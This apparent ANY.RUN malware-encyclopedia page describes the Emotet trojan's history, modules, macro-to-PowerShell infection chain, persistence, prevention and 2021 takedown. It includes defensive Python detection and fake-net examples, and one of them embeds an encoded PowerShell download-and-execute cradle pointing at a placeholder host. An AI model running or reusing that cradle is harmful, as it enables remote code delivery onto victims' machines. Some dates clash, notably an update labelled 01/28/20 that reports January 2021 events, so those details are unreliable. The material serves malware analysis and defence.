Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded into a very destructive piece of malware. It mostly targets corporate victims, but private users also get infected in mass spam email campaigns.

Type: Trojan
Origin: ex-USSR
First seen: 1 June, 2014
Last seen: 23 October, 2021
Also known as: Heodo, Geodo
Global rank: 1
Week rank: 5
Month rank: 5
IOCs: 32715

What is Emotet Trojan?

Emotet is an extremely sophisticated and destructive Trojan used to download and install other malware. First recorded in 2014, it was classified as a banking trojan, but Emotet gained advanced capabilities over the course of its lifetime and evolved into an entire malware distribution service.

So what makes the Emotet virus so dangerous? Based on the analysis, Emotet can act like a worm and spread over local networks, which makes it extremely hard to clean up. In addition, the Trojan has advanced persistence and anti-evasion mechanics, such as the ability to detect sandboxes and virtual machines, with an option to generate false indicators to throw researchers off.

On top of that, the Trojan has a polymorphic design, meaning that it can change its code to bypass signature-based detection, making that defense strategy useless against its attacks. If that wasn’t enough, Emotet can receive updates from the control server, performing this operation as if an operating system update were being installed. This allows the Trojan to stealthily drop additional malware onto the infected machine.

It should also be noted that the Emotet trojan has a modular design, which makes it possible to adapt the malware to various tasks and customize it for every particular campaign, giving the attackers maximum flexibility. Emotet's main targets are governments, corporations, small businesses, and individuals, with a focus on Europe, America, and Canada.

General description of Emotet

The first version of Emotet malware, spotted in the wild all the way back in 2014, was designed to steal banking credentials by intercepting internet traffic and was much more basic than the beast of a Trojan we know today. When Emotet was first spotted in the wild, it mainly targeted banks in Germany and Austria using only its native information-stealing toolset.

Version two followed shortly after, this time carrying several additional modules: money transfer, mail spam, DDoS, and address book stealing. The third iteration of Emotet was released in 2015; this time the attackers focused on upgrading the malware's anti-evasion functionality and added banks from Switzerland to the list of potential victims.

The next overhaul of the Emotet malware followed in December 2016, changing the attack vector of the virus. At the beginning of its lifetime, Version 4 relied heavily on the RIG 4.0 exploit kit to make its way onto victims' computers, later switching primarily to mail spam. The same iteration also marked the moment when the primary use case of the malware started shifting from using its own banking module to dropping other Trojans onto infected machines.

Speaking of modules, Emotet malware can perform a large number of malicious activities that vary depending on the modules used in a particular campaign. Most versions of the virus included a spam module that continues the spread of the malware by sending a series of malicious emails from the infected machine. Another commonly included module is the one used for credential stealing, which lets Emotet steal sensitive information from web browsers and mail clients.

Starting from 2017, the Emotet trojan began coming equipped with a spreader module, allowing the malware to infect all machines connected via a local network. The virus also gained the address book stealer module, and this one is interesting. It analyzes the relationships between email senders and receivers and uses the collected information to improve the effectiveness of subsequent campaigns originating from the user’s PC, allowing the malware to target friends, family members, and colleagues of the victim with personalized spam emails.

Not only does Emotet malware provide flexible functionality through the use of modules and several anti-evasion functions, but it also puts a heavy emphasis on persistence. To ensure that it stays on the infected machine, the malware injects into running processes (often targeting Explorer.exe) and downloads additional payloads. In addition, it uses Scheduled Tasks and modifies registry keys.

It should be noted that the Trojan versions mentioned are extremely destructive, and their attacks can have several consequences, such as loss of private data, inability to operate the infected PC up to the point where it is completely unusable, and financial losses associated with restoring the infrastructure damaged by the malware. In fact, one company was forced to spend in excess of one million dollars to deal with the aftermath of an Emotet attack.

Emotet malware analysis

A video recorded in the ANY.RUN malware hunting service displays the execution process of Emotet, allowing the malware's behavior to be analyzed in a lot of detail.

Figure 1: The process list generated by the ANY.RUN malware hunting service

Figure 2: Even more information about the execution of Emotet can be found in the customizable text reports generated by ANY.RUN

Emotet execution process

Considering that the primary way in which the Emotet trojan is distributed is through malicious email spam campaigns, the first step in the chain of infection involves tricking the potential victim into opening an attached Microsoft Office file using social engineering. After the file has been opened and macros enabled, no further user action is needed. The downloaded files contain malicious VBA code that runs once the document has been opened. In one variant of the infection process, the VBA code uses WMI to launch PowerShell code, which downloads the payload, a malicious executable, from a web server. Notably, the PowerShell script is encoded. Emotet takes steps to maintain a presence on the infected system: it copies itself into %AppData% subfolders and changes the autorun value in the registry. Besides that, the malware allows its operators to download additional payloads. Throughout the infection process, the malware sends information to and receives it from a server. As the last execution step, Emotet waits for commands from its command-and-control servers.
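To make the chain above concrete from the detection side, here is an added example (not code from ANY.RUN or from the page) that runs over constructed Sysmon-style events: it decodes the encoded PowerShell argument, flags PowerShell reached through WMI while an Office application is running (the case a naive "Office spawned PowerShell" rule misses), and lists Run-key entries that point into %AppData%. Field names, paths and sample values are assumptions for illustration.

```python
import base64
import ntpath
import re

# Constructed Sysmon-style sample events (not real telemetry). The macro starts
# PowerShell through WMI, so powershell.exe's parent is WmiPrvSE.exe, not
# WINWORD.EXE: the case a naive "Office spawned PowerShell" rule would miss.
_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload')"
ENCODED = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode("ascii")
PROCESS_EVENTS = [
    {"pid": 100, "image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "WINWORD.EXE /n invoice.doc"},
    {"pid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": "powershell.exe -w hidden -enc " + ENCODED},
]
REGISTRY_EVENTS = [
    {"key": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "svcupd", "data": r"C:\Users\alice\AppData\Roaming\svcupd\svcupd.exe"},
    {"key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "SecurityHealth", "data": r"C:\Windows\System32\SecurityHealthSystray.exe"},
]
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}

def decode_encoded_command(cmdline):
    """Return the script behind a PowerShell -EncodedCommand argument, or None."""
    m = re.search(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")  # PowerShell uses UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None

def find_macro_powershell(events):
    """Flag powershell.exe spawned by an Office app, or by WmiPrvSE.exe while an Office
    app is running (co-occurrence is a simplification; real rules correlate by session/time)."""
    office_running = any(ntpath.basename(e["image"]).lower() in OFFICE for e in events)
    hits = []
    for e in events:
        if ntpath.basename(e["image"]).lower() != "powershell.exe":
            continue
        parent = ntpath.basename(e["parent"]).lower()
        if parent in OFFICE or (parent == "wmiprvse.exe" and office_running):
            hits.append({"pid": e["pid"], "parent": parent, "script": decode_encoded_command(e["cmdline"])})
    return hits

def find_appdata_run_keys(events):
    """Return Run-key values whose target lives under a user's AppData folder."""
    return [e for e in events if e["key"].lower().endswith("\\currentversion\\run")
            and "\\appdata\\" in e["data"].lower()]
```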

Prevention of Emotet attacks

To minimize the risk of Emotet infection, and the potential damage if an infection does occur, users are advised to follow a set of standard best practices, such as not downloading files from suspicious emails and keeping an updated antivirus on the machine at all times.

Organizations are advised to restrict inbound SMB communication between client systems in order to prevent Emotet from spreading from one machine to another within the local network, to provide security training for personnel and instruct employees about the danger of mail spam, and to take all possible precautions to filter out potentially malicious emails at the perimeter.

How does Emotet spread?

According to the analysis, the main distribution method of Emotet malware is malicious email campaigns. The trojan uses its address book stealer module to pull the contacts from the victim's email account and sends its payloads to the contacts it finds from the hijacked account.

Bearing in mind that potential victims receive an email from somebody they know and trust, Emotet has a very high chance of a successful attack. The received email usually contains a link to a malicious URL that downloads the malware and launches the payload when clicked. However, email spam is not the only distribution method this malware uses. It may also take advantage of certain Windows vulnerabilities, so the malware can make its way onto a machine completely “silently”, without the user ever knowing about it.

How to collect Emotet’s IOCs using ANY.RUN?

For detailed Emotet malware analysis, ANY.RUN's "Fake Net" feature is very useful. It intercepts HTTP requests and returns a 404 error, forcing the malware to reveal its command-and-control server links.

To turn it on, open "Advanced mode" in the "New task" window and check the box next to "Fake net" in the "Network" section.
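As an added illustration of how a fake-net sink turns a sample's beaconing into indicators (this is not ANY.RUN's implementation), the following example stands up a local HTTP server that answers everything with 404 and records the Host and path of each attempt. The simulated sample, its host names and the request shape are constructed for the demonstration.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

class FakeNetHandler(BaseHTTPRequestHandler):
    """Answer every HTTP request with 404 and record what the sample tried to reach.
    Getting nothing useful back, a sample typically moves on to its next C2 address."""
    seen = []  # shared across handler instances of one server

    def do_GET(self):
        self._record()

    def do_POST(self):
        self.rfile.read(int(self.headers.get("Content-Length", 0)))  # drain the body
        self._record()

    def _record(self):
        FakeNetHandler.seen.append({"method": self.command, "host": self.headers.get("Host", ""),
                                    "path": self.path, "ua": self.headers.get("User-Agent", "")})
        self.send_response(404)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):  # keep stdout quiet
        pass

def start_fake_net(port=0):
    """Start the fake net on 127.0.0.1 in a background thread; return (server, port)."""
    server = HTTPServer(("127.0.0.1", port), FakeNetHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]

def c2_candidates(records):
    """Deduplicate recorded requests into (host, path) pairs: the IOCs a sandbox run yields."""
    return sorted({(r["host"], r["path"]) for r in records})

def simulate_sample(port, hosts):
    """Constructed stand-in for a sample's beaconing loop: try each C2 host in turn
    (sending its own Host header) and report the HTTP status each attempt got back."""
    statuses = []
    for host in hosts:
        conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
        conn.request("POST", "/check", body=b"id=1", headers={"Host": host, "User-Agent": "Mozilla/4.0"})
        statuses.append(conn.getresponse().status)
        conn.close()
    return statuses

if __name__ == "__main__":
    server, port = start_fake_net()
    simulate_sample(port, ["c2-a.example.invalid", "c2-b.example.invalid"])
    print(c2_candidates(FakeNetHandler.seen))
    server.shutdown()
```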

Figure 3: Running an Emotet sample with the "Fake net" feature turned on

Conclusion

Emotet malware is one of the most sophisticated and destructive trojans. Since its first introduction all the way back in 2014, the malware has undergone a substantial evolution, gaining a lot of anti-evasion features, obtaining worm-like functionality, and even changing its main focus from information stealing to installing other trojans on infected machines. Thanks to its ability to spread to adjacent systems, Emotet can easily infect all machines on a single network, making dealing with the consequences of an attack a true nightmare. The situation is further worsened by the fact that the malware is equipped with a series of anti-evasion tricks that make analyzing it quite difficult. As a result, developing countermeasures is much more complicated than for simpler and more straightforward trojans.

01/28/20 Update: In January 2021 the Emotet botnet was taken down by law enforcement. The global effort, known as Operation Ladybird, located the malware's infrastructure around the globe. At least two members of the cybercriminal gang were arrested in Ukraine. The attackers' names were not disclosed.

Security experts teamed up and simultaneously hijacked hundreds of Emotet command-and-control servers, disrupting its backups as well. Researchers placed their own machines at the IP addresses of the crooks’ computers and made the payload inactive to prevent connections to the botnet.

As a result, Emotet’s C2 servers no longer work and the malware can’t cause any harm to infected machines. Right now a comeback of the malware seems impossible.

Dutch police officials used their access to two crucial servers located in the country to deploy an Emotet update to all infected hosts, one that removes the malware from all infected computers on March 25, 2021.

Thankfully, modern online hunting services like ANY.RUN are equipped with equally advanced research functions and allow professionals to study cyber threats with maximum efficiency, helping researchers battle elusive malware like Emotet.

IOCs

